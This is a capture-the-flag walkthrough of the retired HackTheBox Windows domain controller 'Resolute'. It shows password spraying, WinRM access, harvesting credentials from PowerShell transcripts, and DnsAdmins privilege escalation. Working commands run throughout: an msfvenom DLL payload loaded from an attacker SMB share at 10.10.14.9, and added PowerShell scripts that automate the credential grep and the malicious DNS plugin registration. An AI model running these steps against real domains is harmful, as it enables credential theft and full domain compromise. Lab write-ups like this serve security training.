| Info | |
|---|---|
| IP | / |
| Difficulty | Medium |
| Status | Retired |
| URL | https://app.hackthebox.com/machines/220 |
| Price | Subscription required |

Tags: ldap, winrm, privilege escalation by abusing DnsAdmins group membership
Port scan

```text
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1679/tcp filtered darcorp-lm
3072/tcp filtered csd-monitor
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
10633/tcp filtered unknown
19167/tcp filtered unknown
22109/tcp filtered unknown
23528/tcp filtered unknown
25324/tcp filtered unknown
30073/tcp filtered unknown
34122/tcp filtered unknown
43560/tcp filtered unknown
47001/tcp open winrm
```

DNS, Kerberos, LDAP plus Global Catalog, SMB and ADWS together mean this host is a domain controller. The filtered high ports are noise. The ports worth focusing on are 445 (SMB), 389 (LDAP) and 5985 (WinRM).
LDAP (389)

Scan LDAP with nmap's ldap scripts:

```text
nmap --script="ldap*" ip
```

or use windapsearch (unauthenticated user enumeration, dumping all attributes):

```text
python3 windapsearch.py --dc-ip 10.129.96.155 -U --full
```

This returns the domain, DC=megabank,DC=local, and, in one user's description attribute, the note "Password set to Welcome123!". That is a candidate password, not yet a confirmed credential: an admin left an onboarding default in a field every domain user can read, and it may or may not still be valid for that account.
SMB / RPC

RPC accepts a null session (empty username, no password):

```text
rpcclient -N -U "" ip
# then enumerate the domain users
enumdomusers
```

Save the returned usernames to username.txt:
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
Use crackmapexec to spray the password from the LDAP description across SMB:

```text
crackmapexec smb 10.129.96.155 -u username.txt -p 'Welcome123!' --continue-on-success
SMB 10.129.96.155 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
```

One valid credential: melanie:Welcome123!. A password found in one place is worth trying against every enumerated account, and --continue-on-success keeps the spray going after the first hit so no other reuse is missed.

List the SMB shares as melanie (nothing useful beyond the standard domain controller shares):

```text
crackmapexec smb 10.129.96.155 -u melanie -p 'Welcome123!' --shares
SMB 10.129.96.155 445 RESOLUTE [+] Enumerated shares
SMB 10.129.96.155 445 RESOLUTE Share Permissions Remark
SMB 10.129.96.155 445 RESOLUTE ----- ----------- ------
SMB 10.129.96.155 445 RESOLUTE ADMIN$ Remote Admin
SMB 10.129.96.155 445 RESOLUTE C$ Default share
SMB 10.129.96.155 445 RESOLUTE IPC$ Remote IPC
SMB 10.129.96.155 445 RESOLUTE NETLOGON READ Logon server share
SMB 10.129.96.155 445 RESOLUTE SYSVOL READ Logon server share
```
WinRM (5985)

Spray the same password against WinRM:

```text
crackmapexec winrm 10.129.96.155 -u username.txt -p 'Welcome123!' --continue-on-success
WINRM 10.129.96.155 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
```

(Pwn3d!) means the account is allowed to open a remote PowerShell session. Same credentials as before; connect with evil-winrm:

```text
evil-winrm -i 10.129.96.155 -u melanie -p Welcome123!
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents>
```

The user flag is on melanie's desktop, C:\Users\melanie\Desktop.
Privilege escalation

Lateral movement

PowerShell transcription is enabled on this host. The transcript directory is hidden, so a plain dir does not show it; dir -Force lists hidden files and directories.

The transcripts live under C:\PSTranscripts\20191203, and one of them records a command that was run with a password on the command line:

```text
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
```
That gives a second credential pair, ryan:Serv3r4Admin4cc123!. We already have the user list, so add this password and the previous one to password.txt and spray again with crackmapexec exactly as above. ryan turns out to be allowed to log in over WinRM as well:

```text
evil-winrm -i 10.129.96.155 -u ryan -p Serv3r4Admin4cc123!
```
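As an added example that is not part of the original writeup, the transcript search above generalised into a script to run inside the evil-winrm session: it reports whether transcription is enabled by policy and where transcripts are written, then greps every file under the likely locations for command lines that carry credentials. The transcript root C:\PSTranscripts is taken from the writeup; the additional search roots and the keyword list are assumptions about where credentials usually leak.

```powershell
# Added example, not from the original writeup. Run inside the evil-winrm
# PowerShell session. C:\PSTranscripts comes from the writeup; the other roots
# and the keyword list are assumptions about where credentials usually leak.

# Where does policy send transcripts? Group Policy writes these values.
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
$policy = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue
if ($policy) {
    "Transcription enabled: $($policy.EnableTranscripting)  OutputDirectory: $($policy.OutputDirectory)"
}

# Search roots: the writeup's directory, a common default, the current user's
# profile, and whatever the policy names (assumed locations).
$roots = @('C:\PSTranscripts', 'C:\Transcripts', "$env:USERPROFILE\Documents")
if ($policy -and $policy.OutputDirectory) { $roots += $policy.OutputDirectory }

# Strings that mark a credential on a command line (simple, case-insensitive match).
$keywords = @('net use', '/user:', 'password', '-p ', 'ConvertTo-SecureString', 'PSCredential', 'runas')

foreach ($root in ($roots | Select-Object -Unique)) {
    if (-not (Test-Path -LiteralPath $root)) { continue }
    # -Force is what exposes the hidden transcript directory and its files.
    Get-ChildItem -LiteralPath $root -Recurse -Force -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -in '.txt', '.log', '.ps1', '.psm1' } |
        ForEach-Object {
            Select-String -LiteralPath $_.FullName -Pattern $keywords -SimpleMatch -ErrorAction SilentlyContinue
        } |
        ForEach-Object {
            # One row per matching line: file, line number, and the line itself.
            [pscustomobject]@{ File = $_.Path; Line = $_.LineNumber; Text = $_.Line.Trim() }
        } | Format-Table -AutoSize -Wrap
}
```

The keyword list is deliberately broad; on a real host expect false positives from scripts that merely mention "password", and read each hit in context. The policy check matters because the OutputDirectory can point anywhere, including a network share that other hosts also write to.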
Vertical privilege escalation

https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/

```text
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
```

ryan is a member of DnsAdmins. That group can configure the DNS server, including the ServerLevelPluginDll setting, and the DNS service runs as SYSTEM on the domain controller, so any DLL we register is loaded with SYSTEM privileges the next time the service starts.

DnsAdmins group privilege abuse
Generate the payload DLL with msfvenom (on load it just runs one command, changing the domain Administrator password):

```text
msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll
```

Start an SMB server on the attacking host sharing the current directory as `share` (the share name must match the UNC path used in the dnscmd command below; -smb2support is needed because current Windows Server builds have SMB1 disabled):

```text
impacket-smbserver share $(pwd) -smb2support
```

On the target, register the DLL as the DNS server plugin and restart the service (DnsAdmins membership covers the dnscmd /config call, and ryan can also stop and start the service):

```text
cmd /c dnscmd localhost /config /serverlevelplugindll \\10.10.14.9\share\da.dll
sc.exe stop dns
sc.exe start dns
```

The DLL executes when dns.exe starts, so the Administrator password is now P@s5w0rd123! and psexec.py can be used to connect as Administrator.

Two caveats. Changing the Administrator password is destructive and immediately visible; on a real engagement a payload that returns a shell instead would be the less damaging choice. And the ServerLevelPluginDll value should be cleared afterwards, otherwise the DNS service will try to load the DLL from the attacker's share on every future start.
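As an added example that is not part of the original writeup, the dnscmd procedure above as a single PowerShell script to run as ryan in the evil-winrm session, with the checks a practitioner wants around it: confirm DnsAdmins membership and the DNS service state first, verify the registry value dnscmd writes, wait for the restart to complete, and clear the plugin path again at the end. The UNC path \\10.10.14.9\share\da.dll is the writeup's; treat the attacker IP, share name and DLL name as assumptions.

```powershell
# Added example, not from the original writeup. Run as ryan inside the
# evil-winrm session. The attacker IP, share name and DLL name come from the
# writeup and are assumptions for any other environment.
$dllPath = '\\10.10.14.9\share\da.dll'
$dnsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

# Pre-flight: DnsAdmins membership (whoami /groups includes nested groups)
# and a DNS service we can talk to.
$isDnsAdmin = [bool]((whoami /groups) -match 'DnsAdmins')
$dns = Get-Service -Name DNS -ErrorAction Stop
"DnsAdmins member: $isDnsAdmin   DNS service: $($dns.Status)"
if (-not $isDnsAdmin) { throw 'Not a DnsAdmins member; dnscmd /config will be denied.' }

# Register the DLL. dnscmd stores the path as ServerLevelPluginDll under the
# DNS Parameters key; nothing is loaded until the service restarts.
dnscmd.exe localhost /config /serverlevelplugindll $dllPath
"Registered plugin: " + (Get-ItemProperty -Path $dnsKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll

# Restart. dns.exe runs as SYSTEM and loads the DLL from the share on start,
# which is when the payload executes. sc.exe matches the writeup; the
# WaitForStatus calls make sure each transition actually finished.
sc.exe stop dns | Out-Null
(Get-Service -Name DNS).WaitForStatus('Stopped', [TimeSpan]::FromSeconds(30))
sc.exe start dns | Out-Null
(Get-Service -Name DNS).WaitForStatus('Running', [TimeSpan]::FromSeconds(30))
"DNS service after restart: $((Get-Service -Name DNS).Status)"

# Cleanup: dnscmd with no path clears ServerLevelPluginDll. Without this the
# service keeps trying to load the DLL on every start and fails once the
# attacker's share is gone.
dnscmd.exe localhost /config /serverlevelplugindll
$left = (Get-ItemProperty -Path $dnsKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
"Plugin path after cleanup: '$left'"
sc.exe stop dns | Out-Null
sc.exe start dns | Out-Null
```

If the second WaitForStatus times out, the service failed to come back, most often because SYSTEM could not reach the share or the DLL was not a valid x64 module; check the System event log for DNS service start errors before retrying. On the defensive side, any non-empty ServerLevelPluginDll value, and especially one pointing at a UNC path, is worth alerting on.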